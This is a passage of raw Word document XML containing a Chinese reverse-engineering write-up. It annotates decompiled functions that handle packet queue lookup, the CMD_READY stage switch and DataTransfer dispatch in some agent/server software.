          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="64"/>
        </w:rPr>
        <w:t>// 仅 bit0=1 的包才做队列查找</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve">    v32 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> sub_140BD95C0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t>v7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="54"/>
        </w:rPr>
        <w:t>392</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> packet</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t>AgentID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72"/>
        </w:rPr>
        <w:t>...);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="64"/>
        </w:rPr>
        <w:t>// 以 packet.AgentID 查找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if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t>v32</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve">        v45 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> v32</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t>stored_context</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>];</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="64"/>
        </w:rPr>
        <w:t>// n4 = 存入的 context_value</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve">        sub_140A08C30</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t>v7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="54"/>
        </w:rPr>
        <w:t>392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72"/>
        </w:rPr>
        <w:t>...);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="64"/>
        </w:rPr>
        <w:t>// 出队（删除条目）</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="71"/>
        </w:rPr>
        <w:t>else</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve">        v45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72"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="54"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="64"/>
        </w:rPr>
        <w:t>// 队列未命中 → n4=-1</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B74C612">
      <w:pPr>
        <w:pStyle w:val="49"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5484495" cy="2733040"/>
            <wp:effectExtent l="0" t="0" r="1905" b="10160"/>
            <wp:docPr id="4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4495" cy="273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Style w:val="64"/>
        </w:rPr>
        <w:t>// bit0=0 的包: v45 保持初始值 0 → n4=0</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t>dispatch_callback</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t>conn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72"/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t>header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72"/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t>payload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> ctx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> ctx_extra</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> v45</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="64"/>
        </w:rPr>
        <w:t>/*=n4*/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3182B6B1">
      <w:pPr>
        <w:pStyle w:val="23"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>关键推论</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A9B9FCB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">bit0=0 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>的包</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：跳过队列查找，n4=0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49C742E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">bit0=1 + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>命中队列</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：n4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>存储的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>context_value（服务端发包时写入）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37CB75D4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">bit0=1 + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>未命中队列</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：n4=-1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分发回调视为错误/关闭</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D6F1560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"/>
    <w:bookmarkEnd w:id="12"/>
    <w:p w14:paraId="3EDAA0EF">
      <w:pPr>
        <w:pStyle w:val="5"/>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="Xf0d7494755b7b52ec9188490e52502a5df3cbb5"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>阶段切换函数（sub_1402D7940）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="416D69F7">
      <w:pPr>
        <w:pStyle w:val="23"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>此函数在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> AgentCheck </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>工作线程（sub_140043DC0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Mode </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1）检测到新代理完成认证后触发。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF961C1">
      <w:pPr>
        <w:pStyle w:val="49"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="64"/>
        </w:rPr>
        <w:t>// sub_1402D7940 (AgentTransfer.cpp 相关)</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t>sub_140ADA6A0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t>conn</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> sub_1402D3870</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> ctx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72"/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t>ctx_data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="64"/>
        </w:rPr>
        <w:t>// 注册预分发（日志）</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t>sub_140ADA750</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t>conn</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> sub_1402D3DB0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> ctx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72"/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t>ctx_data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="64"/>
        </w:rPr>
        <w:t>// 注册 DataTransfer 主分发 ←关键</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="64"/>
        </w:rPr>
        <w:t>// 构造 CMD_READY(0x6000) 头部并发送</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t>header</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve">CMD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55"/>
        </w:rPr>
        <w:t>0x6000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="64"/>
        </w:rPr>
        <w:t>// CMD_READY</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t>sub_140ADB3E0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t>conn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72"/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t>header</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> empty_payload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> context</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="54"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="64"/>
        </w:rPr>
        <w:t>// 插入队列: conn+392[header.AgentID] = 0</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="64"/>
        </w:rPr>
        <w:t>// 客户端收到 CMD_READY 后，回复 CMD_WANT_TALK 时此队列被处理</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="64"/>
        </w:rPr>
        <w:t>// 其他初始化</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t>sub_140021B50</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>(...)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="64"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="64"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>配置检查或者配置修改</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t>sub_140161CB0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>(...)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="64"/>
        </w:rPr>
        <w:t>// 上线事件</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t>sub_1409404E0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>(...)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="64"/>
        </w:rPr>
        <w:t>// 统计</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44593378">
      <w:pPr>
        <w:pStyle w:val="23"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>触发条件：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="48"/>
        </w:rPr>
        <w:t>conn+288</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>计数器</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> &gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0（在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CMD_VERSION </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>成功处理后由</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> AgentCheck </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>内部设置）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="507E47AB">
      <w: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3"/>
    <w:p w14:paraId="2BE8900C">
      <w:pPr>
        <w:pStyle w:val="5"/>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="Xa222d25a489b339eebe2f74125cb87a9f670fa8"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. DataTransfer </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>主分发（sub_1402D3DB0）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="125CE6F7">
      <w:pPr>
        <w:pStyle w:val="23"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">DataTransfer </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>阶段的分发函数，AgentTransfer.cpp。函数签名：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15DD0871">
      <w:pPr>
        <w:pStyle w:val="49"/>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t>__int64 sub_1402D3DB0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t>conn</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> header</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>*,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> payload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>*,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> ctx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> ctx_extra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53"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> n4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05FB9829">
      <w:pPr>
        <w:pStyle w:val="49"/>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5480685" cy="3854450"/>
            <wp:effectExtent l="0" t="0" r="5715" b="6350"/>
            <wp:docPr id="5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0685" cy="385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11875">
      <w:pPr>
        <w:pStyle w:val="6"/>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="X99d0457f19659397a29c8794ab4041e895ab2d3"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.1 n4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参数路径分析</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1669D959">
      <w:pPr>
        <w:pStyle w:val="23"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>n4 = 4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（重传连接路径）：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C1ED6AC">
      <w:pPr>
        <w:pStyle w:val="49"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="71"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve">n4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>==</w:t>
      </w:r>
